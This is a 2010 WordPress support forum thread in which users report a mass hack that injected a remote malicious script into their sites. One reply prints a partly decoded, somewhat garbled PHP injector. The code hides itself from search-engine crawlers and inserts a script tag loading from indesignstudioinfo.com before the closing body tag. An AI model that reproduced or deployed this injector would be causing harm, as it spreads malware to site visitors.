Support » Fixing WordPress » 2.9.2 site hacked

  • ardvark

    (@ardvark)


    I visited my WP 2.9.2 site today to get a warning about my site having malware associated with it. Looking at the source, I see a script entry in the HTML body going to http://zettapetta.com/js.php

    Looking at the index.php file, I see that the first line has been hacked with an eval command and a lot of garbage that obviously comprises part of the hack. The timestamps of a lot of WP files has been changed, indicating that they were modified sometime yesterday afternoon.

    Anyone else seen this hack yet; is there a fix? I only found one or two mentions of this online, but all my plugins are up to date and I’m not sure how to ensure this won’t happen again after I do a restore from backup on the site.

    Thanks,
    Matt

Viewing 15 replies - 1 through 15 (of 187 total)
  • ardvark

    (@ardvark)

    FYI, I don’t have any indication that my hosting password was compromised, since it was very secure and I haven’t seen damage apart from the WP site.

    Daniel Cid

    (@ddsucurinet)

    Hey,

    We are seeing lots of sites hacked with the same code today:

    http://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html

    http://sucuri.net/malware/entry/MW:MROBH:1

    Where is your site being hosted?

    Steve D

    (@steve-d)

    Maybe they should contact this guy. He seems to know what he’s doing.

    http://www.youtube.com/watch?v=nabz7t65eUM

    Daniel Cid

    (@ddsucurinet)

    Steve D: Wow. I am wondering if that has been fixed already.

    But in this latest issues, the sites are not restricted to one hosting provider..

    Emanuele Pisapia

    (@dragoonslair)

    Hello my sites in wordpress have the same problems…

    All the website made with wordpress have a strange js code that print a iframe…

    How can i fix it…?

    P.S. They are not on Network Solutions

    Daniel Cid

    (@ddsucurinet)

    dragoonslair: Where is your site hosted?

    Check your footer.php, because in one case just this file was hacked. On others, everything was.

    ardvark

    (@ardvark)

    I’m on Dreamhost, and the links above are exactly the issue.
    Also:

    Breaking News: WordPress Hacked with Zettapetta on DreamHost

    mclanea

    (@mclanea)

    I have about 10 sites infected. All hosted on Bluehost.

    Daniel Cid

    (@ddsucurinet)

    Does anyone here that got infected have a site with Apache logging enabled?

    We would love to see the logs if anyone can share.

    mclanea

    (@mclanea)

    I’ve taken all of my sites offline until we can sort this out.

    Will there be a security release from WP?

    Daniel Cid

    (@ddsucurinet)

    No one knows yet how they got in. I am assuming it is not a bug on WordPress itself otherwise the chaos would be much bigger.

    Maybe a plugin, stolen password?

    andrewacomb

    (@andrewacomb)

    All my sites were hacked also.

    Running on GoDaddy servers and running WP 2.9.1

    Every single PHP file on the ENTIRE site has the malicious Base 64 code at the top. Didn’t miss a single PHP file.

    andrewacomb

    (@andrewacomb)

    Here is the Base 64 code “decoded”, well sort of! Interesting, notice the googlebot and yahoo code.

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("<script src="http://indesignstudioinfo.com/ls.php"></script>"); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode(<script src="http://indesignstudioinfo.com/ls.php"></script>){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }

    You can see at the bottom where it’s “looking” for the BODY tag.

    mclanea

    (@mclanea)

    Other sites I manage on Hostgator and even Bluehost were not effected.

    For now… just killed all of the sites by replacing the index file.

    clundie

    (@clundie)

    This happened to me today, on a site hosted with godaddy, which doesn’t run WordPress and never has.

Viewing 15 replies - 1 through 15 (of 187 total)
  • The topic ‘2.9.2 site hacked’ is closed to new replies.